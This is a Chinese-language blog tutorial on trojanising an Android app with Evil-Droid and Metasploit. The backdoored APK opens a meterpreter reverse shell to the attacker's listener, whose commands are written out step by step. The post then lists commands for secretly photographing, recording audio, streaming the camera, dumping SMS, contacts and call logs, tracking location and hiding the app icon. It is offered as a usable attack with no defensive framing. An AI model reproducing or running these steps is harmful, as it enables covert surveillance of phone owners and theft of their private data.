kali 通过app渗透 android
16lz
2022-07-22
一 、目标
1,实现简单的android渗透,理解原理。
2,可以获取目标手机的内容
二、准备材料
1,kali虚拟机 (我的是2020.4版)
2,手机模拟器
3,Evil-Droid-master(可自己去github下载)
4,一个小app安装包(test.apk)
三、开始
将材料放到kali里面,如下图
更换apktool.jar版本,默认2.3(至少为2.4,自己到网上找吧)
开始搞事情
切换目录
cd Evil-Droid-master
切换到root状态下
su root
安装zipalign库(安装过就不用了)
apt-get install zipalign
授予文件运行权(之前搞过就不用了)
chmod +x evil-droid
运行
./evil-droid
出现下面的即为成功,如有爆红,就是没有安装相应的包,一路确认安装即可
点击“是”
输入“3”
输入您的IP,记住您的IP,之后有用
随便输入一个端口,但是要记住,之后有用
设置生成的木马apk的名字
选如图
选要植入木马的apk
接下来,一直等…
突然想到:kali学的好,局子蹲到老,hhhh
出现下面这样就算成功。
看一下apk路径,点击确定
按图操作
启动msfconsole
msfconsole
设置监听
下面的要一行一行的执行
use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST 192.168.1.54 //你的ipset LPORT 4444 //你的端口exploit
找到木马apk,安装在android里面
其实就是“一个木X”app,他的功能可以正常用,但是一旦运行,我们的木马也自动运行
双击运行
好了,在kali里面可以对这个手机操作了,具体操作看下面命令
webcam_list //列出网络摄像头webcam_stream //开启摄像头webcam_snap //隐秘拍照功能 record_mic [ˈrekərd] /记录/ 从默认麦克风录制音频为X秒 webcam_chat 开始视频聊天 webcam_snap 从指定的摄像头获取快照 webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头]Android Commands================= activity_start 从URI字符串启动Android活动 check_root 检查设备是否有根 dump_calllog 获取调用日志 dump_contacts 获取联系人列表 dump_sms 获取短信 geolocate 利用地理定位获取当前LAT wlan_geolocate 利用WLAN信息获取当前LAT hide_app_icon 从发射器隐藏应用程序图标 interval_collect 管理区间收集能力 send_sms 从目标会话发送短消息 set_audio_mode sqlite_query 从存储库查询SQLite数据库 wakelock 启用/禁用Wakelock可以输入?查看更多命令
四、总结
kali学的好,局子蹲到老,hhhh
更多相关文章
- 【阿里云镜像】切换阿里巴巴开源镜像站镜像——Debian镜像
- Android屏幕分辨率正确获取及PX,DPI,DP,SP等的对应关系
- android 获取唯一标识
- android拍照与读取相册
- Android(安卓)热点开关状态的判断和获取热点ssid
- Android软键盘适配问题
- AIR Native Extension的使用(Android)一 : 打包ane
- android之BitMap
- Android中GPS定位的简单应用